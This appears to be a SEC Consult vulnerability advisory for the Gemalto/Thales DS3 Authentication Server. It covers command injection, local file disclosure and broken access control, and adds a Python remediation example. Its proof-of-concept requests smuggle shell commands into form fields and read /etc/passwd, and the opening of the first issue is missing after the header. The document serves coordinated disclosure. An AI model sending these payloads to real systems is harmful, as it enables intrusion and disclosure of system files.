SEC Consult Vulnerability Lab Security Advisory < 20190509-0 >
=======================================================================
              title: Multiple Vulnerabilities
            product: Gemalto (Thales Group) DS3 Authentication Server /
                     Ezio Server
 vulnerable version: Ezio DS3 server

Content-Type: application/x-www-form-urlencoded
Content-Length: 132

CSRFTOKEN=&HOST_NAME=127.0.0.1`whoami`&PORT_NUMBER=8443&TEST_RESULTS=%0D%0A%09%09%09%09%09%09
########################################################################
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Server: DS3-AuthServer
Content-Length: 12987
...
...
########################################################################

The following request injects a more complex bash payload, written without
any space character (' '/%20) but equivalent to "ls -1 | tail -1", into the
"PORT_NUMBER" parameter; the HTTP response contains the result of the
payload, "liquibase.out", mixed into the page. Please note that the OS
command payload is enclosed in `` characters (backticks).
########################################################################
POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=
Content-Type: application/x-www-form-urlencoded
Content-Length: 173

CSRFTOKEN=&HOST_NAME=127.0.0.1&PORT_NUMBER=8443`CMD1=$'\x20-1';CMD2=$'\x20-1';ls$CMD1|tail$CMD2`&TEST_RESULTS=%0D%0A%09%09%09%09%09%09
########################################################################
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Server: DS3-AuthServer
Content-Length: 13159
...
...
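The following Python example is added here and is not code from the advisory, from SEC Consult or from Gemalto/Thales. It shows the server-side handling that closes the three issue classes reported in this advisory: strict validation of HOST_NAME and PORT_NUMBER with the connectivity check performed by a socket instead of a shell command line (issue 1), an allowlist plus a path containment check for LOG_TYPE instead of a filter that only rejects ".." (issue 2), and a per-endpoint group check enforced on the server rather than by hiding menu entries (issue 3). The endpoint paths and the group names "dsssAdmin" and "READ_ONLY" are taken from the advisory; the log directory, the allowlist, the endpoint-to-group mapping and all function names are assumptions, and the sample requests in the demo are constructed from the advisory's payloads.

```python
import ipaddress
import re
import socket
from collections import deque
from pathlib import Path

# Assumed deployment details (not from the advisory): the server's log directory
# and the files the "Tail Logs Utility" may show.
LOG_DIR = Path("/var/log/ds3")
LOG_ALLOWLIST = frozenset({"audit.log", "server.log"})
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*")
PORT_RE = re.compile(r"[0-9]{1,5}")

# Issue 3: the server decides per endpoint which groups may call it; hiding a menu
# entry is presentation, not authorisation. Group names are the advisory's, the
# mapping itself is an assumption.
ENDPOINT_GROUPS = {
    "/ServerAdmin/TestTelnetConnection.jsp": frozenset({"dsssAdmin"}),
    "/ServerAdmin/TailLogs.jsp": frozenset({"dsssAdmin"}),
}

class RequestRejected(ValueError):
    """A parameter failed validation or the caller's groups do not permit the call."""

def authorize(endpoint, groups):
    if not ENDPOINT_GROUPS.get(endpoint, frozenset()) & set(groups):
        raise RequestRejected("group not permitted to call " + endpoint)

def validate_host(value):
    """Issue 1: an IP literal or a syntactically valid hostname; backticks, '$',
    ';' and '|' can never match, so the injected payloads stop here."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        if HOSTNAME_RE.fullmatch(value):
            return value
    raise RequestRejected("HOST_NAME is not a hostname or IP address")

def validate_port(value):
    """Issue 1: ASCII digits forming 1..65535, with nothing appended."""
    if PORT_RE.fullmatch(value) and 1 <= int(value) <= 65535:
        return int(value)
    raise RequestRejected("PORT_NUMBER must be an integer between 1 and 65535")

def tcp_connect_test(host, port, timeout=3.0):
    """Issue 1: connect with a socket from the application itself, so no shell
    command line is ever built from request parameters."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def resolve_log_file(log_type):
    """Issue 2: allowlist the file name, then resolve it inside LOG_DIR. Rejecting
    only '..' is not enough: the advisory's '+/etc/passwd' contains no '..' and
    reached the tail command as an extra argument via the leading space."""
    if log_type not in LOG_ALLOWLIST:
        raise RequestRejected("LOG_TYPE is not one of the known log files")
    target = (LOG_DIR / log_type).resolve()
    if target.parent != LOG_DIR.resolve():  # also catches a symlink pointing elsewhere
        raise RequestRejected("LOG_TYPE resolves outside the log directory")
    return target

def tail_lines(path, count=10):
    """Read the last `count` lines in-process instead of spawning `tail`."""
    with path.open("r", errors="replace") as fh:
        return list(deque(fh, maxlen=count))

def handle_request(endpoint, params, groups):
    """Dispatch one portal request: ("ok", result) or ("rejected", reason)."""
    try:
        authorize(endpoint, groups)
        if endpoint == "/ServerAdmin/TestTelnetConnection.jsp":
            host = validate_host(params.get("HOST_NAME", ""))
            port = validate_port(params.get("PORT_NUMBER", ""))
            return ("ok", "open" if tcp_connect_test(host, port) else "closed")
        return ("ok", tail_lines(resolve_log_file(params.get("LOG_TYPE", ""))))
    except (RequestRejected, OSError) as exc:
        return ("rejected", str(exc))

def open_local_listener():
    """Demo helper: a listening socket on an ephemeral loopback port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]

if __name__ == "__main__":
    # Constructed requests modelled on the advisory's findings; all are refused.
    bad_port = "8443`CMD1=$'\\x20-1';CMD2=$'\\x20-1';ls$CMD1|tail$CMD2`"
    for endpoint, params, groups in [
        ("/ServerAdmin/TestTelnetConnection.jsp", {"HOST_NAME": "127.0.0.1`whoami`", "PORT_NUMBER": "8443"}, {"dsssAdmin"}),
        ("/ServerAdmin/TestTelnetConnection.jsp", {"HOST_NAME": "127.0.0.1", "PORT_NUMBER": bad_port}, {"dsssAdmin"}),
        ("/ServerAdmin/TailLogs.jsp", {"LOG_TYPE": " /etc/passwd"}, {"dsssAdmin"}),
        ("/ServerAdmin/TailLogs.jsp", {"LOG_TYPE": "audit.log"}, {"READ_ONLY"}),
    ]:
        print(endpoint, sorted(groups), handle_request(endpoint, params, groups))
```

The point of the design is that no request parameter ever reaches a shell: the host and port are parsed into typed values and handed to a socket, the log file is chosen from a fixed set and read by the application, and the group check runs on every call regardless of what the portal's menu displays.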
########################################################################

2) Limited Local File Disclosure (LFD) (Post-authenticated) (CVE-2019-9157)

This POC was performed using an admin user with the "dsssAdmin" group
permission, as the "ADMINISTRATION -> Log Manager -> View Log -> Tail Logs
Utility" function is not accessible to users with the "READ_ONLY" group
permission.

This exploit has the following two restrictions:
1) Only the last 10 lines of the file are displayed.
2) Directory traversal was not allowed, as the parameter cannot contain two
   dot (.) characters.

However, the tester was able to bypass the directory traversal restriction by
injecting the arbitrary filename as an additional argument, rather than by
modifying the first argument.

The following request injects the file "/etc/passwd" into the "LOG_TYPE"
parameter, and the response returns the last 10 lines of the file. Please
note that the injected filename is preceded by the + character (a URL-encoded
space), which makes the filename a separate argument.
########################################################################
GET /ServerAdmin/TailLogs.jsp?LOG_TYPE=+/etc/passwd&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=0&CSRFTOKEN= HTTP/1.1
Host: $IP
Cookie: JSESSIONID=
########################################################################
HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=utf-8
Content-Length: 3702
Server: DS3-AuthServer
...
...
########################################################################

3) Broken Access Control (Post-authenticated) (CVE-2019-9158)

The admin user with the "dsssAdmin" group permission is able to access the
following chain of functions in the menu of the web portal.
* ADMINISTRATION -> Log Manager -> View Log
* ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility

The user with the "READ_ONLY" group permission is not able to access the
following chain of functions in the menu of the web portal.
* ADMINISTRATION -> Log Manager -> View Log

Based on the web portal, a user with the "READ_ONLY" group permission should
therefore also not be able to access the following chain of functions.
* ADMINISTRATION -> Log Manager -> View Log -> Tail Logs Utility

However, it was noted that a user with the "READ_ONLY" group permission is
able to access the "Tail Logs Utility" function by sending the GET request
(captured from the "dsssAdmin" user's session) directly with the "READ_ONLY"
user's own session cookie and CSRFTOKEN token:

https://$IP/ServerAdmin/TailLogs.jsp?LOG_TYPE=audit.log&KEYWORD_FILTER=&REFRESH_RATE=5&TAIL_LINE=392154&CSRFTOKEN=

********************************************************************************

Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable:
* 2.6.1-SP01

The following versions were confirmed to be vulnerable by the vendor:
* All versions earlier than v3.1.0


Vendor contact timeline:
------------------------
2019-02-27: Contacting vendor through csirt@gemalto.com (Gemalto CERT)
2019-03-08: Gemalto CERT confirmed the vulnerabilities for DS3/Ezio Server
            version 2.8.0-update01 and earlier. Requested 2 months disclosure
            embargo period to implement fix for future release.
2019-03-22: Gemalto CERT confirmed the fix for the reported vulnerabilities to
            be included in current sprint and provided CVSSv3 scoring and CWE
            assigned.
2019-03-22: Provided Gemalto CERT with attacker-centric CVSSv3 metrics.
2019-04-05: Gemalto CERT provided updated CVSSv3 metrics.
2019-04-18: Gemalto CERT informed that the fix for the 3 vulnerabilities was
            planned in the upcoming Ezio DS3 server v3.1.0 release by the 1st
            week of May, and asked for an extension of the embargo period.
            Furthermore, Gemalto is now part of the Thales Group.
2019-05-06: Patches available
2019-05-09: Coordinated release of security advisory


Solution:
---------
According to the vendor, the patches are provided to the Support Team L2 and
the Professional Services team, and those teams will get in touch with the
technical contacts of the customers. The update will also be announced via a
future newsletter.

Furthermore, SEC Consult has been informed that the 2.x branch of Ezio DS3
server is not fixed yet and a patch will be available at a later date.
However, customers are reminded about the deployment guidelines to reduce
their attack surface.


Workaround:
-----------
As the vulnerabilities require authentication with valid credentials to the
portal, it is recommended to deploy the application in a trusted zone and to
restrict access to the customer's internal secure network.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF TING Meng Yean / @2019